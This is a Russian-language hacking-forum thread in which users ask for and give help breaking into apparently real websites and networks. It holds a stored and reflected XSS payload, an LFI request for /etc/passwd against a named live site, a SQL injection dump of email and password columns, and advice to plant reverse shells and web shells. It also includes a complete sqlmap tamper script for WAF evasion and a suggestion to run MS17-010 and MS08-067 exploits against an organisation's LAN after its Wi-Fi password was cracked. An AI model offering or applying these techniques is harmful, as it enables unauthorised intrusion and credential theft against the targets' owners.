Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by +, 27 Apr 2015.

  1. Octavian

    Octavian Member

    Joined:
    8 Jul 2015
    Messages:
    452
    Likes Received:
    80
    Reputations:
    20
    Есть сайт на Laravel есть вроде XSS хранимая, <b> и другие теги пропускает а <script> меняет на [removed] пробовал много векторов, помогите приватно
     
  2. b3

    b3 Moderator

    Joined:
    5 Dec 2004
    Messages:
    1,933
    Likes Received:
    769
    Reputations:
    198
    _________________________
  3. Octavian

    Octavian Member

    Joined:
    8 Jul 2015
    Messages:
    452
    Likes Received:
    80
    Reputations:
    20
  4. BabaDook

    BabaDook Level 8

    Joined:
    9 May 2015
    Messages:
    1,023
    Likes Received:
    1,388
    Reputations:
    53
    Вроде можно без скрипт вызвать алерт
     
  5. Octavian

    Octavian Member

    Joined:
    8 Jul 2015
    Messages:
    452
    Likes Received:
    80
    Reputations:
    20
    Есть XSS но этот URL Encode все портит, что можно сделать?
    URL: https://site/news/asd?fbclid='-alert(1)//
    Code:
    onclick="Share.vk('https://site/news/asd?fbclid=%27-alert(1)//')"
     
  6. o314um

    o314um Member

    Joined:
    16 Nov 2006
    Messages:
    265
    Likes Received:
    87
    Reputations:
    5
    И так ситуация:

    Есть выполнение команд в базе mssql и выврд через тайм инжекшн. ОС windows
    можно выполнять команды cmd. Там есть IIS и папка wwwroot. Но как узнать IP адрес внешний,чтобы обратиться к www, web-шеллу? как узнать внешний ИП на котором стоит mssql?
     
  7. Baskin-Robbins

    Baskin-Robbins Well-Known Member

    Joined:
    15 Sep 2018
    Messages:
    125
    Likes Received:
    334
    Reputations:
    18
    проскань подсеть на 1433 порт но это не факт
    раз есть возможность выполнять команды - пропингуй себя в логах потом смотри ip(тоже не точно)
    можно залить обратный шелл и никуда обращаться не нужно будет - тоже не факт
    можно попробовать прочитать скрипты, там должна быть инфа для подключения к базе(а может и нет)
     
    #2707 Baskin-Robbins, 22 Jul 2019
    Last edited: 22 Jul 2019
    seostock likes this.
  8. BenderMR

    BenderMR Member

    Joined:
    23 Feb 2019
    Messages:
    65
    Likes Received:
    23
    Reputations:
    10
    Подскажите как обойти mod security для LFI
    Code:
    http://www.manyforex.com/page.php?X=....//etc/passwd&C=ID-000013&Y=ID-00001223&Z=Particular&Q=MANYForex
     
  9. BenderMR

    BenderMR Member

    Joined:
    23 Feb 2019
    Messages:
    65
    Likes Received:
    23
    Reputations:
    10
    Есть интересный скуль, но когда пробую вытянуть таблицы выдается ошибка, что у юзера бд нет прав:
    Code:
    SELECT command denied to user 'user'@'localhost' for table 'tables'
    Кто то сталкивался с таким? Eсть ли какие то варианты продвинуться дальше?
     
  10. o314um

    o314um Member

    Joined:
    16 Nov 2006
    Messages:
    265
    Likes Received:
    87
    Reputations:
    5
    попробуй пробрутить
     
  11. Octavian

    Octavian Member

    Joined:
    8 Jul 2015
    Messages:
    452
    Likes Received:
    80
    Reputations:
    20
    Чеп прикрыть USB технике что в офисе, не разбирая, не испортив?
     
  12. Octavian

    Octavian Member

    Joined:
    8 Jul 2015
    Messages:
    452
    Likes Received:
    80
    Reputations:
    20
    Где найти нормальной информации про защиту инфы в компаний?
     
  13. RWD

    RWD Member

    Joined:
    25 Apr 2013
    Messages:
    154
    Likes Received:
    38
    Reputations:
    1
    пообщаться с опытным CISO большой компании.
    на линкедине полно контактов.
     
  14. AngelEyes

    AngelEyes New Member

    Joined:
    20 Jun 2019
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    Подскажи плз тампер для обхода этого ваф WAF/IPS identified as 'ASP.NET RequestValidationMode (Microsoft)
    а то при сливе выдает:

    | Email | LoginPassword |
    +-------+---------------+
    | NULL | NULL |
    | NULL | NULL |
    | NULL | NULL |
    | NULL | NULL |
    | NULL | NULL |
    | NULL | NULL |
    | NULL | NULL |
    | NULL | NULL |
    скажи,что может мешать WAF.Буду благодарен и за другие советы по этой проблемке
    P.S новичок в этом,если не затруднит,то можно развернутый ответ для "особо одаренных" =))
     
  15. karkajoi

    karkajoi Active Member

    Joined:
    26 Oct 2016
    Messages:
    235
    Likes Received:
    109
    Reputations:
    1
    Руками надо смотреть на что ругается ВАФ и потом уже искать обход.
    Почитай и попробуй варианты
    https://hydrasky.com/network-security/sql-injection-bypass-cheatsheet/
    http://www.securityidiots.com/Web-Pentest/WAF-Bypass/waf-bypass-guide-part-1.html
    https://medium.com/@drag0n/sqlmap-tamper-scripts-sql-injection-and-waf-bypass-c5a3f5764cb3
     
    AngelEyes likes this.
  16. highmoore

    highmoore New Member

    Joined:
    4 Dec 2017
    Messages:
    11
    Likes Received:
    0
    Reputations:
    0
    Прошу помощи в раскрутке скули
    Что есть? Сайт написанный на Coldfusion, юнион и булеан типы, скуля в гет параметре
    Кручу мапом, мап видит булеан, через ордер бай понимает что есть и юнион, видит что там 3 колонки и натыкается на ваф
    Ругается на слово union, select пропускает
    Мап не может определить даже тип субд из-за того что ваф не пропускает его дальше
    Ошибка вафа :
    You are not permitted to run URL SQL Statements on this server. Your IP address has been logged and e-mailed to our administrator.
    Пробовал юрл энкод, двойной юрл энкод, почти все тамперы которые хоть как-то могли помочь
     
  17. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,458
    Likes Received:
    777
    Reputations:
    834
    Пробуй обойти ваф руками, потом пиши свой тампер на этот ваф, вот как пример

    #!/usr/bin/env python

    """
    Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
    See the file 'doc/COPYING' for copying permission
    """

    from lib.core.enums import PRIORITY

    __priority__ = PRIORITY.HIGHEST

    def dependencies():
    pass

    def tamper(payload, **kwargs):
    """
    ........

    """

    if payload:
    payload = payload.replace("INFORMATION_SCHEMA.TABLES", "/*!12345%49NFORMATION_SCHEMA.TABLES*/")
    payload = payload.replace("table_schema", "/*!12345%74able_schema*/")
    payload = payload.replace("table_name", "/*!12345%74able_name*/")
    payload = payload.replace("UNION", "/*!12345%75NION*/")
    payload = payload.replace("SELECT", "/*!12345%73ELECT*/")
    payload = payload.replace("SCHEMA", "%73CHEMA")
    payload = payload.replace("schema", "%73chema")
    payload = payload.replace("from", "/*!12345from*/")

    return payload
    дальше кладешь в папочку tamper/my_tamper.py и вызываешь --tamper="my_tamper"
     
    _________________________
  18. highmoore

    highmoore New Member

    Joined:
    4 Dec 2017
    Messages:
    11
    Likes Received:
    0
    Reputations:
    0
    Да, это все я понимаю, дело в том, что я руками не могу, все варианты провалились, это MSSQL как оказалось
    С которым у меня не так много опыта, буду благодарен за любую помощь
     
  19. SovaGSN

    SovaGSN New Member

    Joined:
    4 Aug 2019
    Messages:
    9
    Likes Received:
    0
    Reputations:
    0
    Всем доброго вечера! Подскажите, подобрал пароль к wi-fi роутеру организации, видно локальную сеть из 5 устройств и одного принтера. Компы на винде 7. Есть ли возможность проникнуть в расшаренные папки? ибо при попытке захода на удаленный комп внутри ЛВС требуется пароль и логин. Пароль требует только к компу админа, а остальные компы видны только как медиапроигрыватели
     
  20. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,458
    Likes Received:
    777
    Reputations:
    834
    попробуй заюзать эксплоиты ms17-010, ms08-67, очень сомневаюсь что там винда пропатчена
     
    _________________________
Loading...